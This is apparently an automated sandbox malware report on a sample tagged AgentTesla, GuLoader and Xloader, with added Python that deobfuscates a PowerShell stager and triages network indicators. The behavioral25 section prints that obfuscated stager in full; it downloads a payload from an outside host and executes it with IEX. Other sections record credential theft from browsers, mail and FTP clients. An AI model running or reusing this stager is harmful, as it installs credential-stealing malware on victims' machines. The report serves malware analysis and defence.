Malware Analysis Report

2024-12-06 03:12

Sample ID 241121-y6rffaxja1
Target 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
SHA256 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
Tags
discovery defense_evasion agenttesla collection credential_access keylogger spyware stealer trojan guloader downloader xloader nqni loader rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral20, behavioral25, behavioral27, behavioral1, behavioral5, behavioral31, behavioral2, behavioral18, behavioral12, behavioral30, behavioral16, behavioral19, behavioral21, behavioral6, behavioral7, behavioral28, behavioral29, behavioral24, behavioral11, behavioral13, behavioral15, behavioral26, behavioral4, behavioral10, behavioral3, behavioral17, behavioral14, behavioral22, behavioral23, behavioral8, behavioral9 (each: Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca

Threat Level: Known bad

The file 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca was found to be: Known bad.

Malicious Activity Summary

discovery defense_evasion agenttesla collection credential_access keylogger spyware stealer trojan guloader downloader xloader nqni loader rat

Guloader, Cloudeye

Xloader family

Agenttesla family

Guloader family

AgentTesla

Xloader

Xloader payload

AgentTesla payload

Blocklisted process makes network request

Checks computer location settings

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Loads dropped DLL

Reads user/profile data of local email clients

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Gathers system information

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 20:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (12 identical rows)

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3924 -ip 3924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
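The powershell.exe command line above is the stager that the sandbox tagged "Blocklisted process makes network request". Two cheap obfuscation layers hide what it does: string concatenation ('Down' + 'load' + 'Str' + 'ing') keeps the method name, the WebClient constructor and the URL from ever appearing whole, and backtick escapes turn IEX into I`E`X. The DownloadString call is reached through Microsoft.VisualBasic.Interaction.CallByName so the script never contains a direct method call, a test-connection loop stalls until google.com answers (an offline sandbox never gets past it), SecurityProtocolType 3072 forces TLS 1.2, and whatever http://spa2o.com/H99.jpg returns is piped straight into IEX. The Python below is an added example, not part of the report or of any sandbox's code: it undoes exactly those two layers offline and pulls out the triage facts. It assumes the captured string is copied verbatim from the Command Line above; the regexes, the TLS value table and the indicator fields are the example's own heuristics, and nothing is fetched.

```python
import re

# Command line recorded for powershell.exe in the behavioral25 detonation (copied from the report above).
CAPTURED = (
    "powershell $ErrorActionPreference = 'SilentlyContinue';"
    "$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);"
    "[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;"
    "'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;"
    "do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);"
    "$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;"
    "$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', "
    "[Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X"
)

_LITERAL = r"'((?:[^']|'')*)'"                       # single-quoted PowerShell literal; '' is an escaped quote
_CONCAT = re.compile(_LITERAL + r"\s*\+\s*" + _LITERAL)
_TLS = {48: "Ssl3", 192: "Tls", 768: "Tls11", 3072: "Tls12", 12288: "Tls13"}   # System.Net.SecurityProtocolType


def strip_backticks_outside_literals(cmd: str) -> str:
    """Remove backtick escapes in bare tokens (I`E`X -> IEX); quoted literals are left untouched."""
    out, in_literal = [], False
    for ch in cmd:
        if ch == "'":
            in_literal = not in_literal      # a doubled '' toggles twice and stays inside the literal
        if ch == "`" and not in_literal:
            continue
        out.append(ch)
    return "".join(out)


def fold_concats(cmd: str) -> str:
    """Merge 'a' + 'b' into 'ab', repeating until no adjacent literals remain (heuristic, not a parser)."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def deobfuscate(cmd: str) -> str:
    return fold_concats(strip_backticks_outside_literals(cmd))


def extract_indicators(cmd: str) -> dict:
    """Pull the triage-relevant facts out of a deobfuscated one-liner."""
    tls = re.search(r"SecurityProtocolType\]\s*,\s*(\d+)", cmd)
    gate = re.search(r"test-connection\s+-comp\S*\s+(\S+)", cmd, re.I)
    return {
        "urls": re.findall(r"https?://[^\s'\"\)]+", cmd),
        "iex_count": len(re.findall(r"\bIEX\b", cmd)),          # every IEX is one more stage executed from a string
        "tls": _TLS.get(int(tls.group(1))) if tls else None,
        "connectivity_gate": gate.group(1) if gate else None,    # host the script waits for before downloading
        # CallByName lets the script call DownloadString without the method name ever appearing in one piece
        "reflective_call": "CallByname" in cmd and "'DownloadString'" in cmd,
    }


if __name__ == "__main__":
    clean = deobfuscate(CAPTURED)
    print(clean)
    print(extract_indicators(clean))
```

The fold step is deliberately a fixed-point regex rather than a PowerShell tokenizer: it is enough for the `'a' + 'b'` style seen here, but a sample that builds strings with -join, [char] arrays or format operators needs the real parser (for instance PowerShell's own `[System.Management.Automation.Language.Parser]` with script-block logging turned on).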

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 195.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 spa2o.com udp
HR 185.58.73.32:80 spa2o.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/1116-0-0x00007FFDF20F3000-0x00007FFDF20F5000-memory.dmp

memory/1116-1-0x00000000005B0000-0x00000000005B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ymwjjgs.h5c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4008-12-0x000002562A340000-0x000002562A362000-memory.dmp

memory/4008-13-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-14-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-15-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-16-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

memory/4008-19-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 225.219.220.74.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 8.8.8.8:53 26.58.22.2.in-addr.arpa udp
US 8.8.8.8:53 235.86.200.23.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
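Most rows in this table, and in the behavioral25 table above, are reverse (PTR) lookups of Microsoft and sandbox infrastructure addresses, plus the Let's Encrypt OCSP responder r11.o.lencr.org that the TLS handshake to sync-shop.com triggers. The indicators worth keeping are sync-shop.com at 74.220.219.225:443 here (15 separate TCP connections) and spa2o.com at 185.58.73.32:80 in behavioral25, the host the PowerShell stager fetches H99.jpg from. The Python below is an added example, not part of the report: it parses both tables exactly as printed (copied verbatim) and reduces them to a block/hunt list. The allowlist is an assumption of the example, not something the sandbox asserts.

```python
from collections import Counter

# Network tables copied verbatim from this report (Country Destination Domain Proto):
# behavioral25 is the PowerShell downloader, behavioral27 is PO_#YBIC..._Evaluated Copy.exe.
NETWORK_B25 = """\
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 195.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 spa2o.com udp
HR 185.58.73.32:80 spa2o.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
"""
NETWORK_B27 = """\
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 225.219.220.74.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 8.8.8.8:53 26.58.22.2.in-addr.arpa udp
US 8.8.8.8:53 235.86.200.23.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.235:80 r11.o.lencr.org tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
"""

# Assumption of this example, not something the sandbox asserts: PTR lookups are background noise,
# r11.o.lencr.org is the Let's Encrypt OCSP responder hit during the TLS handshake to the real
# destination, roaming.officeapps.live.com is Office telemetry, and google.com is only the
# reachability probe from the behavioral25 command line.
BENIGN_DOMAINS = {"r11.o.lencr.org", "roaming.officeapps.live.com", "google.com"}


def parse_rows(text):
    """One dict per row; none of the four columns contains spaces, so a plain split is safe."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            rows.append(dict(zip(("country", "dest", "domain", "proto"), parts)))
    return rows


def is_noise(row):
    return row["domain"].endswith(".in-addr.arpa") or row["domain"] in BENIGN_DOMAINS


def triage(text):
    """Contacts per (domain, destination, proto, country) after dropping noise rows."""
    counts = Counter()
    for row in parse_rows(text):
        if not is_noise(row):
            counts[(row["domain"], row["dest"], row["proto"], row["country"])] += 1
    return counts


def resolved_hosts(text):
    """domain -> endpoints actually contacted (resolver traffic excluded): the block/hunt list."""
    hosts = {}
    for domain, dest, _proto, _country in triage(text):
        if not dest.startswith("8.8.8.8:"):
            hosts.setdefault(domain, set()).add(dest)
    return hosts


if __name__ == "__main__":
    for name, table in (("behavioral25", NETWORK_B25), ("behavioral27", NETWORK_B27)):
        print(name, dict(triage(table)), resolved_hosts(table))
```

The PTR row 225.219.220.74.in-addr.arpa is the sandbox resolving the reverse name of the contacted server, not traffic the sample chose to generate, which is why reverse lookups are dropped wholesale rather than matched against the allowlist.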

Files

memory/2588-0-0x0000000002220000-0x0000000002221000-memory.dmp

memory/2588-2-0x0000000000406000-0x0000000000407000-memory.dmp

memory/2588-3-0x0000000000400000-0x00000000004AD000-memory.dmp

memory/2588-4-0x0000000002220000-0x0000000002221000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

61s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls

Network

N/A

Files

memory/2344-1-0x00000000722CD000-0x00000000722D8000-memory.dmp

memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2344-3-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-6-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-7-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-5-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-4-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-2-0x0000000000320000-0x0000000000420000-memory.dmp

memory/2344-8-0x00000000722CD000-0x00000000722D8000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

130s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A (5 identical rows)


Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 268 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
